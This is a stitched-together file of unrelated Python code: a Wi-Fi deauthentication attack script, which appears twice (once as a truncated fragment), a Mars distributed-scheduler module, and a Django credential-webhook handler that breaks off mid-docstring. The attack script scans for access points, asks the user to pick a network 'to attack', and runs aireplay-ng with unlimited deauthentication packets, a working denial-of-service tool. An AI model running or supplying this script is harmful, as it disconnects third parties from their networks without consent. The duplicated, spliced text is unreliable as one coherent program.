check_for_essid(row["ESSID"], active_wireless_networks): active_wireless_networks.append(row) print("Scanning. 
Press Ctrl+C when you want to select which wireless network you want to attack.\n") print("No |\tBSSID |\tChannel|\tESSID |") print("___|\t___________________|\t_______|\t______________________________|") for index, item in enumerate(active_wireless_networks): # We're using the print statement with an f-string. # F-strings are a more intuitive way to include variables when printing strings, # rather than ugly concatenations. print(f"{index}\t{item['BSSID']}\t{item['channel'].strip()}\t\t{item['ESSID']}") # We make the script sleep for 1 second before loading the updated list. time.sleep(1) except KeyboardInterrupt: print("\nReady to make choice.") # Ensure that the input choice is valid. while True: # If you don't make a choice from the options available in the list, # you will be asked to please try again. choice = input("Please select a choice from above: ") try: if active_wireless_networks[int(choice)]: break except: print("Please try again.") # To make it easier to work with and read the code, we assign the results to variables. hackbssid = active_wireless_networks[int(choice)]["BSSID"] hackchannel = active_wireless_networks[int(choice)]["channel"].strip() # Change to the channel we want to perform the DOS attack on. # Monitoring takes place on a different channel and we need to set it to that channel. subprocess.run(["airmon-ng", "start", hacknic + "mon", hackchannel]) # Deauthenticate clients using a subprocess. # The script is the parent process and creates a child process which runs the system command, # and will only continue once the child process has completed. subprocess.run(["aireplay-ng", "--deauth", "0", "-a", hackbssid, check_wifi_result[int(wifi_interface_choice)] + "mon"]) # User will need to use control-c to break the script.
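# Illustrative sketch (standalone, not executed by the script above): the wlan-interface
# regex in action on trimmed, made-up iwconfig lines. Real iwconfig output contains far
# more per-interface detail; only the leading interface name matters to the pattern.
import re as _re

_demo_wlan_pattern = _re.compile("^wlan[0-9]+")
assert _demo_wlan_pattern.findall("wlan0     IEEE 802.11  ESSID:off/any") == ["wlan0"]
assert _demo_wlan_pattern.findall("eth0      no wireless extensions.") == []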
# We will be using the subprocess module to run commands on Kali Linux. import subprocess # We require regular expressions. import re # We want to open the CSV files generated by airmon-ng, # and we'll use the built-in csv module. import csv # We want to import os because we want to check for sudo import os # We want to use time.sleep() import time # We want to move .csv files in the folder if we found any. # We'll use shutil for that. import shutil # Create a timestamp for .csv filename from datetime import datetime # Create an empty list active_wireless_networks = [] # We use this function to test if the ESSID is already in the list file. # If so we return False so we don't add it again. # If it is not in the lst we return True which will instruct the elif # statement to add it to the lst. def check_for_essid(essid, lst): check_status = True # If no ESSIDs in list add the row if len(lst) == 0: return check_status # This will only run if there are wireless access points in the list. for item in lst: # If True don't add to list. False will add it to list if essid in item["ESSID"]: check_status = False return check_status # Basic user interface header print(r"""______ _ _ ______ _ _ | _ \ (_) | | | ___ \ | | | | | | | |__ ___ ___ __| | | |_/ / ___ _ __ ___ | |__ __ _| | | | | / _` \ \ / / |/ _` | | ___ \/ _ \| '_ ` _ \| '_ \ / _` | | | |/ / (_| |\ V /| | (_| | | |_/ / (_) | | | | | | |_) | (_| | | |___/ \__,_| \_/ |_|\__,_| \____/ \___/|_| |_| |_|_.__/ \__,_|_|""") print("\n****************************************************************") print("\n* Copyright of David Bombal, 2021 *") print("\n* https://www.davidbombal.com *") print("\n* https://www.youtube.com/davidbombal *") print("\n****************************************************************") # If the user doesn't run the program with super user privileges, don't allow them to continue. if not 'SUDO_UID' in os.environ.keys(): print("Try running this program with sudo.") exit() # Remove .csv files before running the script. for file_name in os.listdir(): # We should only have one csv file as we delete them from the folder # every time we run the program. if ".csv" in file_name: print("There shouldn't be any .csv files in your directory. We found .csv files in your directory and will move them to the backup directory.") # We get the current working directory. directory = os.getcwd() try: # We make a new directory called /backup os.mkdir(directory + "/backup/") except: print("Backup folder exists.") # Create a timestamp timestamp = datetime.now() # We move any .csv files in the folder to the backup folder. shutil.move(file_name, directory + "/backup/" + str(timestamp) + "-" + file_name) # Regex to find wireless interfaces. We're making the assumption they will all be wlan0 or higher. wlan_pattern = re.compile("^wlan[0-9]+") # Python allows is to run system commands by using a function provided by the subprocess module. # subprocess.run(<list of command line arguments goes here>) # The script is the parent process and creates a child process which runs the system command, # and will only continue once the child process has completed. # We run the iwconfig command to look for wireless interfaces. check_wifi_result = wlan_pattern.findall(subprocess.run(["iwconfig"], capture_output=True).stdout.decode()) # No WiFi Adapter connected. 
if len(check_wifi_result) == 0: print("Please connect a WiFi adapter and try again.") exit() # Menu to select WiFi interface from print("The following WiFi interfaces are available:") for index, item in enumerate(check_wifi_result): print(f"{index} - {item}") # Ensure the WiFi interface selected is valid. Simple menu with interfaces to select from. while True: wifi_interface_choice = input("Please select the interface you want to use for the attack: ") try: if check_wifi_result[int(wifi_interface_choice)]: break except: print("Please enter a number that corresponds with the choices available.") # For easy reference we call the selected interface hacknic hacknic = check_wifi_result[int(wifi_interface_choice)] # Tell the user we're going to kill the conflicting processes. print("WiFi adapter connected!\nNow let's kill conflicting processes:") # subprocess.run(<list of command line arguments goes here>) # The script is the parent process and creates a child process which runs the system command, # and will only continue once the child process has completed. # We run the iwconfig command to look for wireless interfaces. # Killing all conflicting processes using airmon-ng kill_confilict_processes = subprocess.run(["sudo", "airmon-ng", "check", "kill"]) # Put wireless in Monitor mode print("Putting Wifi adapter into monitored mode:") put_in_monitored_mode = subprocess.run(["sudo", "airmon-ng", "start", hacknic]) # subprocess.Popen(<list of command line arguments goes here>) # The Popen method opens a pipe from a command. # The output is an open file that can be accessed by other programs. # We run the iwconfig command to look for wireless interfaces. # Discover access points discover_access_points = subprocess.Popen(["sudo", "airodump-ng","-w" ,"file","--write-interval", "1","--output-format", "csv", check_wifi_result[0] + "mon"], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) # Loop that shows the wireless access points. We use a try except block and we will quit the loop by pressing ctrl-c. try: while True: # We want to clear the screen before we print the network interfaces. subprocess.call("clear", shell=True) for file_name in os.listdir(): # We should only have one csv file as we backup all previous csv files from the folder every time we run the program. # The following list contains the field names for the csv entries. fieldnames = ['BSSID', 'First_time_seen', 'Last_time_seen', 'channel', 'Speed', 'Privacy', 'Cipher', 'Authentication', 'Power', 'beacons', 'IV', 'LAN_IP', 'ID_length', 'ESSID', 'Key'] if ".csv" in file_name: with open(file_name) as csv_h: # This will run multiple times and we need to reset the cursor to the beginning of the file. csv_h.seek(0) # We use the DictReader method and tell it to take the csv_h contents and then apply the dictionary with the fieldnames we specified above. # This creates a list of dictionaries with the keys as specified in the fieldnames. csv_reader = csv.DictReader(csv_h, fieldnames=fieldnames) for row in csv_reader: # We want to exclude the row with BSSID. if row["BSSID"] == "BSSID": pass # We are not interested in the client data. elif row["BSSID"] == "Station MAC": break # Every field where an ESSID is specified will be added to the list. elif check_for_essid(row["ESSID"], active_wireless_networks): active_wireless_networks.append(row) print("Scanning. 
Press Ctrl+C when you want to select which wireless network you want to attack.\n") print("No |\tBSSID |\tChannel|\tESSID |") print("___|\t___________________|\t_______|\t______________________________|") for index, item in enumerate(active_wireless_networks): # We're using the print statement with an f-string. # F-strings are a more intuitive way to include variables when printing strings, # rather than ugly concatenations. print(f"{index}\t{item['BSSID']}\t{item['channel'].strip()}\t\t{item['ESSID']}") # We make the script sleep for 1 second before loading the updated list. time.sleep(1) except KeyboardInterrupt: print("\nReady to make choice.") # Ensure that the input choice is valid. while True: # If you don't make a choice from the options available in the list, # you will be asked to please try again. choice = input("Please select a choice from above: ") try: if active_wireless_networks[int(choice)]: break except: print("Please try again.") # To make it easier to work with and read the code, we assign the results to variables. hackbssid = active_wireless_networks[int(choice)]["BSSID"] hackchannel = active_wireless_networks[int(choice)]["channel"].strip() # Change to the channel we want to perform the DOS attack on. # Monitoring takes place on a different channel and we need to set it to that channel. subprocess.run(["airmon-ng", "start", hacknic + "mon", hackchannel]) # Deauthenticate clients using a subprocess. # The script is the parent process and creates a child process which runs the system command, # and will only continue once the child process has completed. subprocess.run(["aireplay-ng", "--deauth", "0", "-a", hackbssid, check_wifi_result[int(wifi_interface_choice)] + "mon"]) # User will need to use control-c to break the script.
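# Illustrative sketch (standalone, not executed by the script above): how the airodump-ng
# CSV is read in the scanning loop - DictReader gets explicit fieldnames, the repeated
# "BSSID" header row is skipped, and parsing stops at the "Station MAC" row that opens the
# client section. The CSV text below is a trimmed, made-up stand-in for a real dump.
import csv as _csv
import io as _io

_demo_fieldnames = ['BSSID', 'First_time_seen', 'Last_time_seen', 'channel', 'Speed', 'Privacy', 'Cipher', 'Authentication', 'Power', 'beacons', 'IV', 'LAN_IP', 'ID_length', 'ESSID', 'Key']
_demo_csv = (
    "BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key\n"
    "AA:BB:CC:DD:EE:FF, 2021-01-01 10:00:00, 2021-01-01 10:05:00, 6, 130, WPA2, CCMP, PSK, -40, 12, 0, 0.0.0.0, 7, HomeNet, \n"
    "Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs\n"
)

_demo_aps = []
for _demo_row in _csv.DictReader(_io.StringIO(_demo_csv), fieldnames=_demo_fieldnames):
    if _demo_row["BSSID"] == "BSSID":
        continue  # the header row airodump-ng repeats inside the dump
    elif _demo_row["BSSID"] == "Station MAC":
        break  # client section begins, stop collecting access points
    _demo_aps.append(_demo_row)

assert _demo_aps[0]["ESSID"].strip() == "HomeNet"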
# Copyright 1999-2020 Alibaba Group Holding Ltd. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import copy import heapq import logging import os import random import sys import time from collections import defaultdict from .. import promise from ..config import options from ..errors import DependencyMissing from ..utils import log_unhandled from .operands import BaseOperandActor from .resource import ResourceActor from .utils import SchedulerActor logger = logging.getLogger(__name__) class ChunkPriorityItem(object): """ Class providing an order for operands for assignment """ def __init__(self, session_id, op_key, op_info, callback): self._op_key = op_key self._session_id = session_id self._op_info = op_info self._target_worker = op_info.get('target_worker') self._callback = callback self._priority = () self.update_priority(op_info['optimize']) def update_priority(self, priority_data, copyobj=False): obj = self if copyobj: obj = copy.deepcopy(obj) priorities = [] priorities.extend([ priority_data.get('depth', 0), priority_data.get('demand_depths', ()), -priority_data.get('successor_size', 0), -priority_data.get('placement_order', 0), priority_data.get('descendant_size'), ]) obj._priority = tuple(priorities) return obj @property def session_id(self): return self._session_id @property def op_key(self): return self._op_key @property def target_worker(self): return self._target_worker @target_worker.setter def target_worker(self, value): self._target_worker = value @property def callback(self): return self._callback @property def op_info(self): return self._op_info def __repr__(self): return f'<ChunkPriorityItem({self.op_key}({self.op_info["op_name"]}))>' def __lt__(self, other): return self._priority > other._priority class AssignerActor(SchedulerActor): """ Actor handling worker assignment requests from operands. Note that this actor does not assign workers itself.
""" @staticmethod def gen_uid(session_id): return f's:h1:assigner${session_id}' def __init__(self): super().__init__() self._requests = dict() self._req_heap = [] self._cluster_info_ref = None self._actual_ref = None self._resource_ref = None self._worker_metrics = None # since worker metrics does not change frequently, we update it # only when it is out of date self._worker_metric_time = 0 self._allocate_requests = [] def post_create(self): logger.debug('Actor %s running in process %d', self.uid, os.getpid()) self.set_cluster_info_ref() # the ref of the actor actually handling assignment work session_id = self.uid.rsplit('$', 1)[-1] self._actual_ref = self.ctx.create_actor(AssignEvaluationActor, self.ref(), uid=AssignEvaluationActor.gen_uid(session_id)) self._resource_ref = self.get_actor_ref(ResourceActor.default_uid()) def pre_destroy(self): self._actual_ref.destroy() self.unset_cluster_info_ref() def allocate_top_resources(self, max_allocates=None): self._allocate_requests.append(max_allocates) self._actual_ref.allocate_top_resources(fetch_requests=True, _tell=True, _wait=False) def get_allocate_requests(self): reqs = self._allocate_requests self._allocate_requests = [] return reqs def mark_metrics_expired(self): logger.debug('Metrics cache marked as expired.') self._worker_metric_time = 0 self._actual_ref.mark_metrics_expired(_tell=True) def _refresh_worker_metrics(self): t = time.time() if self._worker_metrics is None or self._worker_metric_time + 1 < time.time(): # update worker metrics from ResourceActor self._worker_metrics = self._resource_ref.get_workers_meta() self._worker_metric_time = t def filter_alive_workers(self, workers, refresh=False): if refresh: self._refresh_worker_metrics() return [w for w in workers if w in self._worker_metrics] if self._worker_metrics else [] def _enqueue_operand(self, session_id, op_key, op_info, callback=None): priority_item = ChunkPriorityItem(session_id, op_key, op_info, callback) if priority_item.target_worker not in self._worker_metrics: priority_item.target_worker = None self._requests[op_key] = priority_item heapq.heappush(self._req_heap, priority_item) @promise.reject_on_exception @log_unhandled def apply_for_resource(self, session_id, op_key, op_info, callback=None): """ Register resource request for an operand :param session_id: session id :param op_key: operand key :param op_info: operand information, should be a dict :param callback: promise callback, called when the resource is assigned """ self._allocate_requests.append(1) self._refresh_worker_metrics() self._enqueue_operand(session_id, op_key, op_info, callback) logger.debug('Operand %s enqueued', op_key) self._actual_ref.allocate_top_resources(fetch_requests=True, _tell=True, _wait=False) @log_unhandled def apply_for_multiple_resources(self, session_id, applications): self._allocate_requests.append(len(applications)) self._refresh_worker_metrics() logger.debug('%d operands applied for session %s', len(applications), session_id) for app in applications: op_key, op_info = app self._enqueue_operand(session_id, op_key, op_info) self._actual_ref.allocate_top_resources(fetch_requests=True, _tell=True) @log_unhandled def update_priority(self, op_key, priority_data): """ Update priority data for an operand. The priority item will be pushed into priority queue again. 
:param op_key: operand key :param priority_data: new priority data """ if op_key not in self._requests: return obj = self._requests[op_key].update_priority(priority_data, copyobj=True) heapq.heappush(self._req_heap, obj) @log_unhandled def remove_apply(self, op_key): """ Cancel request for an operand :param op_key: operand key """ if op_key in self._requests: del self._requests[op_key] def pop_head(self): """ Pop and obtain top-priority request from queue :return: top item """ item = None while self._req_heap: item = heapq.heappop(self._req_heap) if item.op_key in self._requests: # use latest request item item = self._requests[item.op_key] break else: item = None return item def extend(self, items): """ Extend heap by an iterable object. The heap will be reheapified. :param items: priority items """ self._req_heap.extend(items) heapq.heapify(self._req_heap) class AssignEvaluationActor(SchedulerActor): """ Actor assigning operands to workers """ @classmethod def gen_uid(cls, session_id): return f's:0:{cls.__name__}${session_id}' def __init__(self, assigner_ref): super().__init__() self._worker_metrics = None self._worker_metric_time = time.time() - 2 self._cluster_info_ref = None self._assigner_ref = assigner_ref self._resource_ref = None self._session_last_assigns = dict() self._mem_usage_cache = dict() def post_create(self): logger.debug('Actor %s running in process %d', self.uid, os.getpid()) self.set_cluster_info_ref() self._assigner_ref = self.ctx.actor_ref(self._assigner_ref) self._resource_ref = self.get_actor_ref(ResourceActor.default_uid()) self.periodical_allocate() def pre_destroy(self): self.unset_cluster_info_ref() def mark_metrics_expired(self): logger.debug('Metrics cache marked as expired.') self._worker_metric_time = 0 def periodical_allocate(self): self.allocate_top_resources() self.ref().periodical_allocate(_tell=True, _delay=0.5) def allocate_top_resources(self, fetch_requests=False): """ Allocate resources given the order in AssignerActor """ t = time.time() if self._worker_metrics is None or self._worker_metric_time + 1 < time.time(): # update worker metrics from ResourceActor self._worker_metrics = self._resource_ref.get_workers_meta() self._worker_metric_time = t if not self._worker_metrics: return if fetch_requests: requests = self._assigner_ref.get_allocate_requests() if not requests: return max_allocates = sys.maxsize if any(v is None for v in requests) else sum(requests) else: max_allocates = sys.maxsize unassigned = [] reject_workers = set() assigned = 0 # the assigning procedure will continue till all workers rejected # or max_allocates reached while len(reject_workers) < len(self._worker_metrics) and assigned < max_allocates: item = self._assigner_ref.pop_head() if not item: break try: alloc_ep, rejects = self._allocate_resource( item.session_id, item.op_key, item.op_info, item.target_worker, reject_workers=reject_workers) except: # noqa: E722 logger.exception('Unexpected error occurred in %s', self.uid) if item.callback: # pragma: no branch self.tell_promise(item.callback, *sys.exc_info(), _accept=False) else: self.get_actor_ref(BaseOperandActor.gen_uid(item.session_id, item.op_key)) \ .handle_unexpected_failure(*sys.exc_info(), _tell=True, _wait=False) continue # collect workers failed to assign operand to reject_workers.update(rejects) if alloc_ep: # assign successfully, we remove the application self._assigner_ref.remove_apply(item.op_key, _tell=True) self._session_last_assigns[item.session_id] = time.time() assigned += 1 else: # put the unassigned item 
into unassigned list to add back to the queue later unassigned.append(item) if unassigned: # put unassigned back to the queue, if any self._assigner_ref.extend(unassigned, _tell=True) if not fetch_requests: self._assigner_ref.get_allocate_requests(_tell=True, _wait=False) @log_unhandled def _allocate_resource(self, session_id, op_key, op_info, target_worker=None, reject_workers=None): """ Allocate resource for single operand :param session_id: session id :param op_key: operand key :param op_info: operand info dict :param target_worker: worker to allocate, can be None :param reject_workers: workers denied to assign to """ if target_worker not in self._worker_metrics: target_worker = None reject_workers = reject_workers or set() op_io_meta = op_info.get('io_meta', {}) try: input_metas = op_io_meta['input_data_metas'] except KeyError: input_metas = self._get_chunks_meta(session_id, op_io_meta.get('input_chunks', {})) missing_keys = [k for k, m in input_metas.items() if m is None] if missing_keys: raise DependencyMissing(f'Dependencies {missing_keys!r} missing for operand {op_key}') if target_worker is None: input_sizes = dict((k, v.chunk_size) for k, v in input_metas.items()) who_has = dict((k, meta.workers) for k, meta in input_metas.items()) candidate_workers = self._get_eps_by_worker_locality(who_has, input_sizes) else: candidate_workers = [target_worker] candidate_workers = [w for w in candidate_workers if w not in reject_workers] if not candidate_workers: return None, [] # todo make more detailed allocation plans calc_device = op_info.get('calc_device', 'cpu') try: mem_usage = self._mem_usage_cache[op_key] except KeyError: pure_dep_keys = set(op_io_meta.get('pure_dep_chunk_keys', ())) mem_usage = self._mem_usage_cache[op_key] = \ sum(v.chunk_size for k, v in input_metas.items() if k not in pure_dep_keys) if calc_device == 'cpu': alloc_dict = dict(cpu=options.scheduler.default_cpu_usage, mem_quota=mem_usage) elif calc_device == 'cuda': alloc_dict = dict(cuda=options.scheduler.default_cuda_usage, mem_quota=mem_usage) else: # pragma: no cover raise NotImplementedError(f'Calc device {calc_device} not supported') last_assign = self._session_last_assigns.get(session_id, time.time()) timeout_on_fail = time.time() - last_assign > options.scheduler.assign_timeout rejects = [] for worker_ep in candidate_workers: if self._resource_ref.allocate_resource( session_id, op_key, worker_ep, alloc_dict, log_fail=timeout_on_fail): logger.debug('Operand %s(%s) allocated to run in %s', op_key, op_info['op_name'], worker_ep) self._mem_usage_cache.pop(op_key, None) self.get_actor_ref(BaseOperandActor.gen_uid(session_id, op_key)) \ .submit_to_worker(worker_ep, input_metas, _tell=True, _wait=False) return worker_ep, rejects else: rejects.append(worker_ep) if timeout_on_fail: running_ops = sum(len(metrics.get('progress', dict()).get(str(session_id), dict())) for metrics in self._worker_metrics.values()) if running_ops == 0: raise TimeoutError(f'Assign resources to operand {op_key} timed out') else: self._session_last_assigns[session_id] = time.time() return None, rejects def _get_chunks_meta(self, session_id, keys): if not keys: return dict() return dict(zip(keys, self.chunk_meta.batch_get_chunk_meta(session_id, keys))) def _get_eps_by_worker_locality(self, chunk_workers, input_sizes): locality_data = defaultdict(lambda: 0) for k in input_sizes.keys(): if k in chunk_workers: for ep in chunk_workers[k]: locality_data[ep] += input_sizes[k] workers = list(self._worker_metrics.keys()) random.shuffle(workers) 
max_locality = -1 max_eps = [] for ep in workers: if locality_data[ep] > max_locality: max_locality = locality_data[ep] max_eps = [ep] elif locality_data[ep] == max_locality: max_eps.append(ep) return max_eps
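# Illustrative sketch (standalone, not part of the scheduler module above): the ordering
# trick used by ChunkPriorityItem - heapq implements a min-heap, so __lt__ uses a reversed
# comparison (self._priority > other._priority) to make the item with the highest priority
# tuple pop first. The toy items below stand in for real operand requests.
import heapq as _heapq

class _DemoPriorityItem(object):
    def __init__(self, name, priority):
        self.name = name
        self._priority = priority

    def __lt__(self, other):
        # reversed comparison turns heapq's min-heap into a max-heap
        return self._priority > other._priority

_demo_heap = []
for _demo_name, _demo_prio in [("shallow", (1,)), ("deep", (3,)), ("middle", (2,))]:
    _heapq.heappush(_demo_heap, _DemoPriorityItem(_demo_name, _demo_prio))

assert _heapq.heappop(_demo_heap).name == "deep"  # highest priority tuple comes out first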
import json import logging import time import os import random import base64 from django.conf import settings from drf_yasg.utils import swagger_auto_schema from rest_framework import permissions, status from rest_framework.decorators import api_view, permission_classes from rest_framework.response import Response from api.v2.models.Credential import Credential as CredentialModel from api.v2.utils import log_timing_method, log_timing_event, call_agent_with_retry from agent_webhooks.utils.credential import Credential, CredentialManager from agent_webhooks.utils.issuer import IssuerManager LOGGER = logging.getLogger(__name__) TOPIC_CONNECTIONS = "connections" TOPIC_CONNECTIONS_ACTIVITY = "connections_activity" TOPIC_CREDENTIALS = "issue_credential" TOPIC_CREDENTIALS_2_0 = "issue_credential_v2_0" TOPIC_CREDENTIALS_2_0_INDY = "issue_credential_v2_0_indy" TOPIC_PRESENTATIONS = "presentations" TOPIC_PRESENT_PROOF = "present_proof" TOPIC_GET_ACTIVE_MENU = "get-active-menu" TOPIC_PERFORM_MENU_ACTION = "perform-menu-action" TOPIC_ISSUER_REGISTRATION = "issuer_registration" PROCESS_INBOUND_CREDENTIALS = os.environ.get('PROCESS_INBOUND_CREDENTIALS', 'true') if PROCESS_INBOUND_CREDENTIALS.upper() == "TRUE": LOGGER.debug(">>> YES processing inbound credentials") PROCESS_INBOUND_CREDENTIALS = True else: LOGGER.error(">>> NO not processing inbound credentials") PROCESS_INBOUND_CREDENTIALS = False RANDOM_ERRORS = os.environ.get('RANDOM_ERRORS', 'false').upper() == "TRUE" if RANDOM_ERRORS: LOGGER.error(">>> YES generating random credential processing errors") @swagger_auto_schema(method="post", auto_schema=None) @api_view(["POST"]) @permission_classes((permissions.AllowAny,)) def agent_callback(request, topic): message = request.data if "state" not in message: LOGGER.warn(f"Received aca-py webhook without state. message={message}") state = message["state"] if "state" in message else None LOGGER.debug(f"Received aca-py webhook. state={state} message={message}") start_time = time.perf_counter() method = "agent_callback." + topic + ("." + state if state else "") log_timing_event(method, message, start_time, None, False) # dispatch based on the topic type if topic == TOPIC_CONNECTIONS: response = Response("") elif topic == TOPIC_CONNECTIONS_ACTIVITY: response = Response("") elif topic == TOPIC_CREDENTIALS: response = handle_credentials(state, message) elif topic == TOPIC_CREDENTIALS_2_0: response = handle_credentials_2_0(state, message) elif topic == TOPIC_CREDENTIALS_2_0_INDY: response = handle_credentials_2_0(state, message) elif topic == TOPIC_PRESENTATIONS or topic == TOPIC_PRESENT_PROOF: response = handle_presentations(state, message) elif topic == TOPIC_GET_ACTIVE_MENU: response = Response("") elif topic == TOPIC_PERFORM_MENU_ACTION: response = Response("") elif topic == TOPIC_ISSUER_REGISTRATION: response = handle_register_issuer(message) else: LOGGER.info("Callback: topic=" + topic + ", message=" + json.dumps(message)) end_time = time.perf_counter() log_timing_method(method, start_time, end_time, False) log_timing_event(method, message, start_time, end_time, False) return Response("Invalid topic: " + topic, status=status.HTTP_400_BAD_REQUEST) end_time = time.perf_counter() log_timing_method(method, start_time, end_time, True) log_timing_event(method, message, start_time, end_time, True) return response # create one global manager instance credential_manager = CredentialManager() def handle_credentials(state, message): """ Receives notification of a credential processing event. 
For example, for a greenlight registration credential: message = { "connection_id": "12345", "credential_definition_id": "6qnvgJtqwK44D8LFYnV5Yf:3:CL:25:tag", "credential_exchange_id": "666", "credential_id": "67890", "credential_offer": {}, "credential_request": {}, "credential_request_metadata": {}, "credential": { "referent": "67892", "values": { "address_line_1": "2230 Holdom Avenue", "address_line_2": "", "addressee": "Ms. Brenda J Strachan", "city": "Surrey", "corp_num": "FM0243624", "country": "CA", "entity_name_effective": "2007-08-30", "entity_status": "Active", "entity_status_effective": "2007-08-30", "entity_type": "BC Company", "legal_name": "LOEFFLER PIZZA PLACE LIMITED", "postal_code": "V3T 4Y5", "province": "BC", "reason_description": "Filing:REGST", "registration_date": "2007-08-30" }, "schema_id": "6qnvgJtqwK44D8LFYnV5Yf:2:Registered Corporation:1.0.3", "cred_def_id": "6qnvgJtqwK44D8LFYnV5Yf:3:CL:25:tag", "rev_reg_id": null, "rev_reg": null, "witness": "Ian", "cred_rev_id": null, "signature": "ian costanzo, honest", "signature_correctness_proof": "honest" }, "initiator": "...", "schema_id": "...", "state": "stored", "thread_id": "..." } """ credential_exchange_id = message["credential_exchange_id"] LOGGER.debug( f'Credential: state="{state}" credential_exchange_id="{credential_exchange_id}"' ) response_data = {} try: if state == "offer_received": LOGGER.debug("After receiving credential offer, send credential request") # no need to perform a task, we run the agent with the --auto-respond-credential-offer flag set response_data = { "success": True, "details": f"Received offer on credential exchange {credential_exchange_id}", } elif state == "credential_received": raw_credential = message["raw_credential"] # You can include this exception to test error reporting if RANDOM_ERRORS: raise_random_exception(credential_exchange_id, 'credential_recieved') credential_data = { "thread_id": message["thread_id"], "schema_id": raw_credential["schema_id"], "cred_def_id": raw_credential["cred_def_id"], "rev_reg_id": raw_credential["rev_reg_id"] if "rev_reg_id" in raw_credential else None, "attrs": {}, } for attr in raw_credential["values"]: credential_data["attrs"][attr] = raw_credential["values"][attr]["raw"] return receive_credential(credential_exchange_id, credential_data) elif state == "stored": LOGGER.debug("Credential Stored") response_data = {"success": True, "details": "Credential Stored"} except Exception as e: LOGGER.error(e) LOGGER.error(f"Send problem report for {credential_exchange_id}") # Send a problem report for the error resp = call_agent_with_retry( f"{settings.AGENT_ADMIN_URL}/issue-credential/records/{credential_exchange_id}/problem-report", post_method=True, payload={"description": str(e)}, headers=settings.ADMIN_REQUEST_HEADERS, ) resp.raise_for_status() return Response({"success": False, "error": str(e)}) return Response(response_data) def handle_presentations(state, message): LOGGER.debug(f" >>>> handle_presentations({state})") if state == "request_received": presentation_request = message["presentation_request"] presentation_exchange_id = message["presentation_exchange_id"] # Pull referents out of presentation request requested_attribute_referents = list( presentation_request["requested_attributes"].keys() ) requested_predicates_referents = list( presentation_request["requested_predicates"].keys() ) # Comma delimit all referents for agent API request referents = ",".join( requested_attribute_referents + requested_predicates_referents ) credentials = [] if 
presentation_request["name"].startswith("cred_id::"): cred_id = presentation_request["name"][9:] resp = call_agent_with_retry( f"{settings.AGENT_ADMIN_URL}/credential/" + f"{cred_id}", post_method=False, headers=settings.ADMIN_REQUEST_HEADERS, ) resp.raise_for_status() wallet_credential = resp.json() wallet_credentials = { "cred_info": wallet_credential, "interval": None, "presentation_referents": requested_attribute_referents + requested_predicates_referents } credentials = [wallet_credentials, ] credential_query = presentation_request["name"] if 0 == len(credentials): resp = call_agent_with_retry( f"{settings.AGENT_ADMIN_URL}/present-proof/records/" + f"{message['presentation_exchange_id']}/credentials/" + f"{referents}", post_method=False, headers=settings.ADMIN_REQUEST_HEADERS, ) resp.raise_for_status() # All credentials from wallet that satisfy presentation request credentials = resp.json() credential_query = f"/present-proof/records/{message['presentation_exchange_id']}/credentials/{referents}" # Prep the payload we need to send to the agent API credentials_for_presentation = { "self_attested_attributes": {}, "requested_attributes": {}, "requested_predicates": {}, } for referent in requested_attribute_referents: credentials_for_presentation["requested_attributes"][referent] = {} for referent in requested_predicates_referents: credentials_for_presentation["requested_predicates"][referent] = {} # we should have a single credential at this point results_length = len(credentials) if results_length != 1: raise Exception( "Number of credentials returned by query " + f"{credential_query} was not 1, it was {results_length}" ) credential = credentials[0] credential_id = credential["cred_info"]["referent"] # For all "presentation_referents" on this `credential` returned # from the wallet, we can apply this credential_id as the selected # credential for the presentation for related_referent in credential["presentation_referents"]: if ( related_referent in credentials_for_presentation["requested_attributes"] ): credentials_for_presentation["requested_attributes"][ related_referent ]["cred_id"] = credential_id credentials_for_presentation["requested_attributes"][ related_referent ]["revealed"] = True elif ( related_referent in credentials_for_presentation["requested_predicates"] ): credentials_for_presentation["requested_predicates"][ related_referent ]["cred_id"] = credential_id credentials_for_presentation["requested_predicates"][ related_referent ]["revealed"] = True else: raise Exception( f"Referent {related_referent} returned from wallet " + "was not expected in proof request." ) # We should have a fully constructed presentation now. 
# Let's check to make sure: for referent in credentials_for_presentation["requested_attributes"]: if credentials_for_presentation["requested_attributes"][referent] == {}: raise Exception( f"requested_attributes contains unfulfilled referent {referent}" ) for referent in credentials_for_presentation["requested_predicates"]: if credentials_for_presentation["requested_predicates"][referent] == {}: raise Exception( f"requested_predicates contains unfulfilled referent {referent}" ) # Finally, we should be able to send this payload to the agent for it # to finish the process and send the presentation back to the verifier # (to be verified) resp = call_agent_with_retry( f"{settings.AGENT_ADMIN_URL}/present-proof/records/" + f"{presentation_exchange_id}/send-presentation", post_method=True, payload=credentials_for_presentation, headers=settings.ADMIN_REQUEST_HEADERS, ) resp.raise_for_status() return Response() def handle_register_issuer(message): """Handles the registration of a new issuing agent in the credential registry. The agent registration credential will be in the following format: { "issuer_registration_id": "string", "connection_id": "string", "issuer_registration": { "credential_types": [ { "category_labels": {"category": "label"}, "claim_descriptions": {"claim": "description"}, "claim_labels": {"claim": "label"}, "credential_def_id": "string", "schema": "string", "version": "string", "name": "string", "credential": { "effective_date": {"input": "topic_id", "from": "claim"} }, "topic": [ { "source_id": {"input": "topic_id", "from": "claim"} } ], "endpoint": "string", "cardinality_fields": ["string"], "mapping": {}, "visible_fields": ["string"], "logo_b64": "string", } ], "issuer": { "name": "string", "did": "string", "abbreviation": "string", "email": "string", "url": "string", "endpoint": "string", "logo_b64": "string" } } } """ issuer_manager = IssuerManager() updated = issuer_manager.register_issuer(message) # reset the global CredentialManager instance (to clear the CredentialType cache) global credential_manager credential_manager = CredentialManager() # update tagging policy tag_policy_updates = {} cred_types = updated.credential_types for ctype in cred_types: tag_attrs = ctype.get_tagged_attributes() if tag_attrs: tag_policy_updates[ctype.credential_def_id] = tag_attrs return Response( content_type="application/json", data={"result": updated.serialize()} ) def handle_credentials_2_0(state, message): """ Receives notification of a credential 2.0 processing event. For example, for a registration credential: message = { "cred_proposal": { ... }, "role": "issuer", "initiator": "self", "created_at": "2021-04-30 02:54:32.925351Z", "conn_id": "ae5f0b97-746e-4062-bdf2-27b9d6809cc9", "auto_issue": true, "cred_preview": { ... }, 